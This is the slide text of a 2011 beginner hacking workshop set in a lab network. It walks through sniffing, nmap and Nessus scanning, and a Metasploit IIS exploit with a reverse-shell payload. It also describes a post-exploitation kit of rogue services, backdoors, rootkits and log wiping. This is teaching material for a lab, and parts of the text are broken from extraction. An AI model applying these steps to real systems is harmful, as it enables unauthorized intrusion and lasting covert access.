pwnage workshop beta 8 14 2011
TRANSCRIPT
-
8/3/2019 Pwnage Workshop Beta 8 14 2011
1/81
Pwnage Workshop
From zero to hero Level 1 ScriptKiddie
-
8/3/2019 Pwnage Workshop Beta 8 14 2011
2/81
Table of contents
Legal
Overview
Requirements Entering the Lab
The scenario
5 intro to backtrack Lets get started
-
8/3/2019 Pwnage Workshop Beta 8 14 2011
3/81
Legal
To be able to join this workshop you have
to agree that you are completely responsible
about what are you doing after you left this
room. We encourage you: dont use this tools
and technics to be evil.
-
8/3/2019 Pwnage Workshop Beta 8 14 2011
4/81
Overview
This workshop is set in the earliest 2000s, our
aim is to let you know some hacking technics
from basic networking to exploiting machines
trough a hands on workshop.
Enjoy!
-
8/3/2019 Pwnage Workshop Beta 8 14 2011
5/81
Requirements
Human:1. Basic Microsoft Windows knowledge
2. Basic Linux knowledge
3. Basic Vmware knowledge
4. Basic networking knowledge
5. Patience
6. Respect7. Then GOTO 5
Hardware: Computer/Laptop
2+ GB RAM
Ethernet AND Wireless access
Software: Vmware
Virtualized version of Backtrack
-
8/3/2019 Pwnage Workshop Beta 8 14 2011
6/81
Entering the Lab
Identify yourethernet lan network.
Disable LAN tcp IPv4& IPv6
Open Vmware Virtual Network Editor
Identify or create a network,Bridged it with your ethernet lan.
Just plug your ethernet cable in the designated swith.
-
8/3/2019 Pwnage Workshop Beta 8 14 2011
7/81
Entering the Lab
Go to your backtrack virtual machine and right
click on the networking icon placed at the
bottom right.
Select custom,
and select the
name of the
network bridgedto lan.
-
8/3/2019 Pwnage Workshop Beta 8 14 2011
8/81
Storyline
-
8/3/2019 Pwnage Workshop Beta 8 14 2011
9/81
The scenario
What you know.
There should be something behind the switch.
What you dont know. Everything else.
-
8/3/2019 Pwnage Workshop Beta 8 14 2011
10/81
5 intro to backtrack
The /pentest/ directory
Most of the programs can be run from shell
The desktop (run startx on terminal)
See multiples terminals at the same time andalso for running Maltego
-
8/3/2019 Pwnage Workshop Beta 8 14 2011
11/81
5 intro to backtrack
Finding tools
The $PATH
echo $PATH
The find command
root@bt:~# find / -name nmap root@bt:~# find /pentest/ -name '*.dic
Terminate running program
Control + C
And of course TAB for autocompleting and the arrow to use your
previously typed commands
-
8/3/2019 Pwnage Workshop Beta 8 14 2011
12/81
Lets get started
Challenge 1: Obtain IP address.
Challenge 2: Detect/Define our victim.
Challenge 3: Service recognition. Challenge 4: Vulnerability detection.
Challenge 5: Exploiting vulnerability.
Challenge 6: Gain remote access.
Challenge 7: Remote network recognition.
Challenge 8: Exploiting Remote machines.
-
8/3/2019 Pwnage Workshop Beta 8 14 2011
13/81
-
8/3/2019 Pwnage Workshop Beta 8 14 2011
14/81
Challenge 1: Obtain IP address.
So you are in the middle of idk just connected
your plug and nothing happened, what can we
do? Logging in Backtrack
For user pass read the welcome screen in BT
Bringing up your Ethernet interface.
Ifconfig eth0 up
Assigning the right IP address to your pc.
-
8/3/2019 Pwnage Workshop Beta 8 14 2011
15/81
First we listenTo be able to obtain a valid IP we can listen into
the network and see if it give us some tipe ofwhich one is the right IP range.
Intro to Network Sniffers
What are sniffers?Promiscuous mode
Sniffing with Tcpdump
Challenge 1: Obtain IP address.
-
8/3/2019 Pwnage Workshop Beta 8 14 2011
16/81
Intro to Network Sniffers
What are sniffers?
Promiscuous mode
Challenge 1: Obtain IP address.
-
8/3/2019 Pwnage Workshop Beta 8 14 2011
17/81
Sniffing with tcpdump
List devicesroot@bt:~# tcpdump -D
1.eth0
2.usbmon1 (USB bus number 1)
3.any (Pseudo-device that captures on all interfaces)
4.lo
Select the right device and start listening
root@bt:~# tcpdump -i eth0
tcpdump: WARNING: eth0: no IPv4 address assigned
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 96 bytes
See something? See too much? Try filtersroot@bt:~# tcpdump -n arp -i eth0
root@bt:~# tcpdump -n tcp -i eth0
tcpdump -n tcp and dst port 23 -i eth0
Challenge 1: Obtain IP address.
-
8/3/2019 Pwnage Workshop Beta 8 14 2011
18/81
You found the right IP range!!!
Set up your ip addressroot@bt:~# ifconfig eth0 192.168.1.6/24
Challenge 1: Obtain IP address.
-
8/3/2019 Pwnage Workshop Beta 8 14 2011
19/81
Mission List
Challenge 1: Obtain IP address.
Challenge 2: Detect/Define our victim.
Challenge 3: Service recognition.
Challenge 4: Vulnerability detection.
Challenge 5: Exploiting vulnerability.
Challenge 6: Gain remote access.
Challenge 7: Remote network recognition.
Challenge 8: Exploiting Remote machines.
-
8/3/2019 Pwnage Workshop Beta 8 14 2011
20/81
-
8/3/2019 Pwnage Workshop Beta 8 14 2011
21/81
Challenge 2: Detect/Define our victim.
The art of scanning:
What is scanning
Ping? Pong!
Dissection of a scan one packet at time.
Netcat, nmap, amap
-
8/3/2019 Pwnage Workshop Beta 8 14 2011
22/81
What is scanning
Ping? Pong! Ping sweep: A method that can establish a range of IP addresses which map to live hosts.
Example: nmap -sn 192.168.69.0/24
Starting Nmap 5.35DC1 ( http://nmap.org ) at 2011-07-14 15:58 EDT
Nmap scan report for 192.168.69.1
Host is up (0.0031s latency).
MAC Address: 00:21:29:AA:A6:89 (Cisco-Linksys)
Nmap scan report for 192.168.69.104
Host is up (0.0023s latency).
MAC Address: 00:50:43:6A:20:2B (Marvell Semiconductor)
Nmap scan report for 192.168.69.145
Host is up.
Nmap done: 256 IP addresses (3 hosts up) scanned in 3.48 second
Challenge 2: Detect/Define our victim.
-
8/3/2019 Pwnage Workshop Beta 8 14 2011
23/81
Challenge 2: Detect/Define our victim.
Dissection of a ping sweep one packet at time.
Wireshark: View of a Ping sweep
-
8/3/2019 Pwnage Workshop Beta 8 14 2011
24/81
Now its your time, find your victim.
Challenge 2: Detect/Define our victim.
-
8/3/2019 Pwnage Workshop Beta 8 14 2011
25/81
Mission List
Challenge 1: Obtain IP address.
Challenge 2: Detect/Define our victim.
Challenge 3: Service recognition.
Challenge 4: Vulnerability detection.
Challenge 5: Exploiting vulnerability.
Challenge 6: Gain remote access.
Challenge 7: Remote network recognition.
Challenge 8: Exploiting Remote machines.
-
8/3/2019 Pwnage Workshop Beta 8 14 2011
26/81
-
8/3/2019 Pwnage Workshop Beta 8 14 2011
27/81
Challenge 3: Service recognition.
Ports & port scanning.
Services
What are services Detecting services
Banner recognition
-
8/3/2019 Pwnage Workshop Beta 8 14 2011
28/81
Ports Port: A port is an application serving as a communications endpoint. It is used by the transport protocols
of the Internet Protocol Suite, such as Transmission Control Protocol (TCP) and User Datagram Protocol(UDP).
The port numbers are divided into three ranges: the Well Known Ports, the Registered Ports, and theDynamic and/or Private Ports.
The Well Known Ports are those from 0 through 1023. (ftp, telnet, tftp)
The Registered Ports are those from 1024 through 49151 (socks , ms-sql, mysql)
The Dynamic and/or Private Ports are those from 49152 through 65535
TCP & UDP
http://www.iana.org/assignments/port-numbers
Challenge 3: Service recognition.
-
8/3/2019 Pwnage Workshop Beta 8 14 2011
29/81
Port Scanningroot@bt:~# nmap -n -p1-65535 192.168.69.104
Starting Nmap 5.35DC1 ( http://nmap.org ) at 2011-07-17 15:07 EDT
Nmap scan report for 192.168.69.104
Host is up (0.041s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 00:50:43:6A:20:2B (Marvell Semiconductor)
Nmap done: 1 IP address (1 host up) scanned in 37.48 seconds
Challenge 3: Service recognition.
-
8/3/2019 Pwnage Workshop Beta 8 14 2011
30/81
Wireshark port scan capture
Challenge 3: Service recognition.
3 way handshake
-
8/3/2019 Pwnage Workshop Beta 8 14 2011
31/81
Services:
Some services:
Ssh, dhcp, dns, authentication, proxy, email, web,snmp, ftp, tftp
Challenge 3: Service recognition.
-
8/3/2019 Pwnage Workshop Beta 8 14 2011
32/81
Banner recognitionroot@bt:~# nmap -n -p22 -sV 192.168.69.104
Starting Nmap 5.35DC1 ( http://nmap.org ) at 2011-07-17 15:40 EDT
Nmap scan report for 192.168.69.104Host is up (0.0020s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.1p1 Debian 8 (protocol 2.0)
MAC Address: 00:50:43:6A:20:2B (Marvell Semiconductor)
Service Info: OS: Linux
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.17 seconds
Challenge 3: Service recognition.
-
8/3/2019 Pwnage Workshop Beta 8 14 2011
33/81
Wireshark service detection capture
Challenge 3: Service recognition.
-
8/3/2019 Pwnage Workshop Beta 8 14 2011
34/81
Closing chapter 3
After you got the results, lets create a generalknowledge of the results:
How many machines?
Which Oss?
Which ports?
Which Services? Which Software?
Are server or desktop machines?
Challenge 3: Service recognition.
-
8/3/2019 Pwnage Workshop Beta 8 14 2011
35/81
2 Free TIPs
Browsing the servicesBrowse 2 common services with their corresponding client
Use netcat to connect to the services
Why dont we try to recognize the SO running on each
machine?Try:
Nmap O host
Challenge 3: Service recognition.
-
8/3/2019 Pwnage Workshop Beta 8 14 2011
36/81
Mission List
Challenge 1: Obtain IP address.
Challenge 2: Detect/Define our victim.
Challenge 3: Service recognition.
Challenge 4: Vulnerability detection.
Challenge 5: Exploiting vulnerability.
Challenge 6: Gain remote access.
Challenge 7: Remote network recognition.
Challenge 8: Exploiting Remote machines.
-
8/3/2019 Pwnage Workshop Beta 8 14 2011
37/81
-
8/3/2019 Pwnage Workshop Beta 8 14 2011
38/81
Challenge 4: Vulnerability detection.
What are vulnerabilities IETF RFC 2828 define vulnerability as:
A flaw or weakness in a system's design,implementation, or operation and management that
could be exploited to violate the system's security policy
Playing with Nessus What is Nessus
Installing Nessus on Backtrack Creating policies
Understanding the results
-
8/3/2019 Pwnage Workshop Beta 8 14 2011
39/81
Playing with Nessus What is Nessus
Is a vulnerability scanner bla bla bla.
Installing Nessus on backtrackWe are going to connect our backtrack machine to the public internet in order to
retrieve Nessus from their home site. Unbridge and bridge to your wireless
dhcpclient
Nessus.org register (as home user)
Obtain your code (check inbox)
Paste the command in a shell
Go to create user
Rebridge to your ethernet
Re set to your first ip
Nessus start
Browse into https:yourip:8834
Challenge 4: Vulnerability detection.
-
8/3/2019 Pwnage Workshop Beta 8 14 2011
40/81
Challenge 4: Vulnerability detection.
Playing with Nessus What is Nessus
Installing Nessus on backtrack
Creating policies The Nessus interface is kind of intuitive. Take 5 minutes to create your own policy (keep in mind the
results from the previous stages).
Now after you did it, please dont forget to also include thefollowing plugins:
CGI abuses RPC
Web Servers
Windows
-
8/3/2019 Pwnage Workshop Beta 8 14 2011
41/81
Playing with Nessus
Installing Nessus on backtrack
Creating policies
Understanding the results
If results !=0 then go read them, again take your time.
From the results which machines are vulnerable?
Challenge 4: Vulnerability detection.
-
8/3/2019 Pwnage Workshop Beta 8 14 2011
42/81
Mission List
Challenge 1: Obtain IP address.
Challenge 2: Detect/Define our victim.
Challenge 3: Service recognition.
Challenge 4: Vulnerability detection.
Challenge 5: Exploiting vulnerability.
Challenge 6: Gain remote access.
Challenge 7: Remote network recognition.
Challenge 8: Exploiting Remote machines.
-
8/3/2019 Pwnage Workshop Beta 8 14 2011
43/81
-
8/3/2019 Pwnage Workshop Beta 8 14 2011
44/81
Creating your hack-kit
Using exploits:
Simple exploits The Metasploit framework
Challenge 5: Exploiting vulnerability.
-
8/3/2019 Pwnage Workshop Beta 8 14 2011
45/81
Creating your hack-kitHack-kit is your own set of tools, for
backdooring/administrating/protecting your new server you
will upload after you break on a server.In general you would like to upload:
Process/services tools: Lists/kill process.
File transfer tools: Normally an FTP.
Administration tools: Access to remote desktop.
Covering tracks: Logs laundry.
Hiding your stuff: Rootkits.
Maintaining access: Backdoors.
Expansion tools: scanners and more exploits.
Hardening: Patches, Services Packs.
Challenge 5: Exploiting vulnerability.
-
8/3/2019 Pwnage Workshop Beta 8 14 2011
46/81
Proposed tools
Listing/killing process and port scanning.This tools let you take a look from the command line about who is running on the remote server, as well starting remoterecognaince.
Fport.exe Fport 2.0
KILL.EXE
T
LIST
.EXE dfind.exe
Client/Administration tools:Let you administrate remotely your rogue services
Remote administrator 2.1
Serv-u administrator 3
Rogue FTP-serverSimple and powerfull FTP server
WINMGNT.EXE
ServUDaemon.ini
Rogue Remote Administration toolIf you want remote desktop, here is a solution, telnet and file transfer capabilities included as well
AdmDll.dll
r_server.exe
raddrv.dll
settings.reg
Challenge 5: Exploiting vulnerability.
-
8/3/2019 Pwnage Workshop Beta 8 14 2011
47/81
How to use the tools.
Installing rogue services
The important capabilities of this rogues services are the chance
to install them as services and from the command line.
So once you are in the remote shell, transfer your
hackkit(pack.exe) and run the following commands
Challenge 5: Exploiting vulnerability.
-
8/3/2019 Pwnage Workshop Beta 8 14 2011
48/81
-
8/3/2019 Pwnage Workshop Beta 8 14 2011
49/81
-
8/3/2019 Pwnage Workshop Beta 8 14 2011
50/81
Challenge 5: Exploiting vulnerability.
What are exploits.
Why they are funny.
Where you can find them. How to use them.
Compiling
T
esting executing
-
8/3/2019 Pwnage Workshop Beta 8 14 2011
51/81
What are exploits.
An exploit is a piece of software, a chunk of data, or sequence of commands that takesadvantage of a bug, glitch or vulnerability in order to cause unintended or unanticipated behaviorto occur on computer software, hardware, or something electronic . This frequently includes suchthings as gaining control of a computer system, allowing privilege escalation or a denial of service
attack.
Types
Exploits are commonly categorized and named by these criteria:
The type of vulnerability they exploit
Whether they need to be run on the same machine as the program that has the vulnerability(local) or can be run on one machine to attack a program running on another machine(remote).
The result of running the exploit (Remote access, privilege escalation, DoS, data leak, etc.)
Challenge 5: Exploiting vulnerability.
-
8/3/2019 Pwnage Workshop Beta 8 14 2011
52/81
Challenge 5: Exploiting vulnerability.
What are exploits.
Why they are funny. Because they could give us unauthorized access to something (data,
remote machine, and/or become administrator).
-
8/3/2019 Pwnage Workshop Beta 8 14 2011
53/81
Challenge 5: Exploiting vulnerability.
How an exploit looks like.
-
8/3/2019 Pwnage Workshop Beta 8 14 2011
54/81
Challenge 5: Exploiting vulnerability.
-
8/3/2019 Pwnage Workshop Beta 8 14 2011
55/81
Challenge 5: Exploiting vulnerability.
Meanwhile in a veryvery very secure
server
-
8/3/2019 Pwnage Workshop Beta 8 14 2011
56/81
Challenge 5: Exploiting vulnerability.
-
8/3/2019 Pwnage Workshop Beta 8 14 2011
57/81
Challenge 5: Exploiting vulnerability.
Back to our very very
very secure server.
Well, thanks for the
info.You bad service,
spited a file and then
went to sleep?
COMMON
-
8/3/2019 Pwnage Workshop Beta 8 14 2011
58/81
-
8/3/2019 Pwnage Workshop Beta 8 14 2011
59/81
Challenge 5: Exploiting vulnerability.
What are exploits.
Why they are funny.
Where you can find them.
-
8/3/2019 Pwnage Workshop Beta 8 14 2011
60/81
Where you can
find them.There are multiple sites, one of
them is exploit-db.com with ahuge lists of exploits for
multiple softwares.
Challenge 5: Exploiting vulnerability.
-
8/3/2019 Pwnage Workshop Beta 8 14 2011
61/81
Some others things about exploits: Public exploits vs private exploits.
Open source vs closed/compiled ones.
Protected, fakes, bobytraps and rootkiteds.
And we also have Metasploit.
Challenge 5: Exploiting vulnerability.
-
8/3/2019 Pwnage Workshop Beta 8 14 2011
62/81
Challenge 5: Exploiting vulnerability.
What are exploits.
Why they are funny.
Where you can find them. How to use them.
Compiling
Testing
executing
-
8/3/2019 Pwnage Workshop Beta 8 14 2011
63/81
Using Metasploit Setting up metasploit to attack a machine: Select the exploit, the victim, and what do you want to do on that machine,
profit.
First, you have to know the module name (its on the nessus output)
Run metasploit/pentest/exploits/framework3/msfconsole
Search for the exploit
show exploits Start using the exploit
Info windows/iis/ms01_026_dbldecode
Use windows/iis/ms01_026_dbldecode
Ask for the configShow options
Minumin requirements
set RHOST 192.168.1.11
Set the payloadset payload /generic/shell_reverse_tcp
Ask for the configSet LHOST YOURIP
Exploit!
NOW WHAAAAAAAAAAAAAAAAAAAATTTTTTT
Challenge 5: Exploiting vulnerability.
-
8/3/2019 Pwnage Workshop Beta 8 14 2011
64/81
Challenge 5: Exploiting vulnerability.
-
8/3/2019 Pwnage Workshop Beta 8 14 2011
65/81
Challenge 5: Exploiting vulnerability.
-
8/3/2019 Pwnage Workshop Beta 8 14 2011
66/81
Mission List
Challenge 1: Obtain IP address.
Challenge 2: Detect/Define our victim.
Challenge 3: Service recognition.
Challenge 4: Vulnerability detection.
Challenge 5: Exploiting vulnerability.
Challenge 6: Gain remote access.
Challenge 7: Remote network recognition.
Challenge 8: Exploiting Remote machines.
-
8/3/2019 Pwnage Workshop Beta 8 14 2011
67/81
-
8/3/2019 Pwnage Workshop Beta 8 14 2011
68/81
Challenge 6: Gain remote access.
You hacked it, right, now what?
Installing channels or something, remoteadministrator, serv-u, netcat
-
8/3/2019 Pwnage Workshop Beta 8 14 2011
69/81
Mission List
Challenge 1: Obtain IP address.
Challenge 2: Detect/Define our victim.
Challenge 3: Service recognition.
Challenge 4: Vulnerability detection.
Challenge 5: Exploiting vulnerability.
Challenge 6: Gain remote access.
Challenge 7: Remote network recognition.
Challenge 8: Exploiting Remote machines.
-
8/3/2019 Pwnage Workshop Beta 8 14 2011
70/81
-
8/3/2019 Pwnage Workshop Beta 8 14 2011
71/81
Challenge 7: Remote network
recognition.
We have to go deeper
Scanning the LANHere we are going to use some tool from our
hackkit, dfind
-
8/3/2019 Pwnage Workshop Beta 8 14 2011
72/81
Mission List
Challenge 1: Obtain IP address.
Challenge 2: Detect/Define our victim.
Challenge 3: Service recognition.
Challenge 4: Vulnerability detection.
Challenge 5: Exploiting vulnerability.
Challenge 6: Gain remote access.
Challenge 7: Remote network recognition.
Challenge 8: Exploiting Remote machines.
h ll l i i
-
8/3/2019 Pwnage Workshop Beta 8 14 2011
73/81
Challenge 8: Exploiting Remote
machines.
So you detected some machines, you detected
some services, now its time to exploit them.
What tools can we use to exploit remote
vulnerabilities?
Ch ll 8 E l i i R
-
8/3/2019 Pwnage Workshop Beta 8 14 2011
74/81
Challenge 8: Exploiting Remote
machines.
Exploiting remote Windows Machines
Analyzing dfind results
Searching for vulnerabilitys info available
Prepare the exploit
Profit
Ch ll 8 E l i i R
-
8/3/2019 Pwnage Workshop Beta 8 14 2011
75/81
Challenge 8: Exploiting Remote
machines.
Exploiting remote Linux Machines
Analyzing dfind results
Searching for vulnerabilitys info available
Prepare the exploit
Profit
Ch ll 8 E l i i R
-
8/3/2019 Pwnage Workshop Beta 8 14 2011
76/81
Challenge 8: Exploiting Remote
machines.
Once you have one
Man in the middle attacks (ettercap) Dns poisoning
Exploiting browsers
-
8/3/2019 Pwnage Workshop Beta 8 14 2011
77/81
-
8/3/2019 Pwnage Workshop Beta 8 14 2011
78/81
-
8/3/2019 Pwnage Workshop Beta 8 14 2011
79/81
Super Secret Network Topology
-
8/3/2019 Pwnage Workshop Beta 8 14 2011
80/81
Machines and their vulnerabilities
Exploiting Windows NT 4 from Nessus to Metasploit. (IIS)
Red Hat 6.2 7350wu.c Wu-ftpd v2.6.0 remote root exploit.
Backtrack Nessus Metasploit autopwn: KABOOM!!! Hacking windows 2000.
-
8/3/2019 Pwnage Workshop Beta 8 14 2011
81/81
Challenge List
Challenge 1: Obtain IP address.
Challenge 2: Detect/Define our victim.
Challenge 3: Service recognition.
Challenge 4: Vulnerability detection.
Challenge 5: Exploiting vulnerability.
Challenge 6: Gain remote access.
Challenge 7: Remote network recognition.
Challenge 8: Exploiting Remote machines.